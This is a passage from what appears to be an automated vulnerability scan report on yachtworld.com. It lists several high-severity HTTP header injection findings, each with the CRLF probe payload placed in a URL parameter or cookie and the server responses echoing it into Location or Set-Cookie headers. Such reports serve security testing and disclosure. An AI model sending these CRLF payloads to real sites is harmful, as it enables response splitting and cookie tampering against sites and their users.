GET /core/listing/pl_boat_detail_handler.jsp?slim=a0d07%0d%0ac827c8a1387&hosturl=starlingmarine&units=Feet&boat_id=2275416&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.3.10.1296155835; s_pers=%20s_nr%3D1296155882977%7C1298747882977%3B%20s_lv%3D1296155882978%7C1390763882978%3B%20s_lv_s%3DFirst%2520Visit%7C1296157682978%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:39:07 GMT
Server: Apache
Cache-Control: private
Location: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=2275416&lang=en&slim=a0d07
c827c8a1387&&hosturl=starlingmarine&&ywo=starlingmarine&
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 195

The URL has moved <a href="http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=2275416&lang=en&slim=a0d07
c827c8a1387&&hosturl=starlingmarine&&ywo=starlingmarine&">here</a>

2.6. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [units parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the units request parameter is copied into the Location response header. The payload edada%0d%0acbdfc443266 was submitted in the units parameter. This caused a response containing an injected HTTP header.

Request

GET /core/listing/pl_boat_detail_handler.jsp?slim=broker&hosturl=starlingmarine&units=edada%0d%0acbdfc443266&boat_id=2275416&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.3.10.1296155835; s_pers=%20s_nr%3D1296155882977%7C1298747882977%3B%20s_lv%3D1296155882978%7C1390763882978%3B%20s_lv_s%3DFirst%2520Visit%7C1296157682978%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:39:55 GMT
Server: Apache
Cache-Control: private
Location: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=edada
cbdfc443266&id=2275416&lang=en&slim=broker&&hosturl=starlingmarine&&ywo=starlingmarine&
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 197

The URL has moved <a href="http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=edada
cbdfc443266&id=2275416&lang=en&slim=broker&&hosturl=starlingmarine&&ywo=starlingmarine&">here</a>

2.7. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [currency parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/privatelabel/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the currency request parameter is copied into the Location response header. The payload 3e221%0d%0a5b524a18b0d was submitted in the currency parameter. This caused a response containing an injected HTTP header.

Request

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp279757&currency=3e221%0d%0a5b524a18b0d&units=Feet&currencyid=100&boat_id=2267335&primary_photo_id=30&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 302 Found
Date: Thu, 27 Jan 2011 20:01:29 GMT
Server: Apache
Cache-Control: private
Location: http://www.yachtworld.com/privatelabel/listing/pl_boat_detail.jsp?currency=3e221
5b524a18b0d&units=Feet&id=2267335&lang=en&slim=pp279757&
Content-Length: 176
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

The URL has moved <a href="http://www.yachtworld.com/privatelabel/listing/pl_boat_detail.jsp?currency=3e221
5b524a18b0d&units=Feet&id=2267335&lang=en&slim=pp279757&">here</a>

2.8. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [slim parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/privatelabel/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the slim request parameter is copied into the Location response header. The payload d9915%0d%0a0e475e20fcd was submitted in the slim parameter. This caused a response containing an injected HTTP header.

Request

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=d9915%0d%0a0e475e20fcd&currency=USD&units=Feet&currencyid=100&boat_id=2267335&primary_photo_id=30&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 302 Found
Date: Thu, 27 Jan 2011 20:01:27 GMT
Server: Apache
Cache-Control: private
Location: http://www.yachtworld.com/privatelabel/listing/pl_boat_detail.jsp?currency=USD&units=Feet&id=2267335&lang=en&slim=d9915
0e475e20fcd&
Content-Length: 171
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

The URL has moved <a href="http://www.yachtworld.com/privatelabel/listing/pl_boat_detail.jsp?currency=USD&units=Feet&id=2267335&lang=en&slim=d9915
0e475e20fcd&">here</a>

2.9. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [units parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/privatelabel/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the units request parameter is copied into the Location response header. The payload 67044%0d%0a3831b3bd0d0 was submitted in the units parameter. This caused a response containing an injected HTTP header.

Request

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp279757&currency=USD&units=67044%0d%0a3831b3bd0d0&currencyid=100&boat_id=2267335&primary_photo_id=30&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 302 Found
Date: Thu, 27 Jan 2011 20:01:40 GMT
Server: Apache
Cache-Control: private
Location: http://www.yachtworld.com/privatelabel/listing/pl_boat_detail.jsp?currency=USD&units=67044
3831b3bd0d0&id=2267335&lang=en&slim=pp279757&
Content-Length: 175
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

The URL has moved <a href="http://www.yachtworld.com/privatelabel/listing/pl_boat_detail.jsp?currency=USD&units=67044
3831b3bd0d0&id=2267335&lang=en&slim=pp279757&">here</a>

2.10. https://www.yachtworld.com/ [savedLabel0 cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/

Issue detail

The value of the savedLabel0 cookie is copied into the Set-Cookie response header. The payload ab4ad%0d%0a2d954fcf23f was submitted in the savedLabel0 cookie. This caused a response containing an injected HTTP header.

Request

GET / HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=ab4ad%0d%0a2d954fcf23f; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:48:22 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: savedSearch0=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch0=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:22 GMT
Set-Cookie: savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=ab4ad
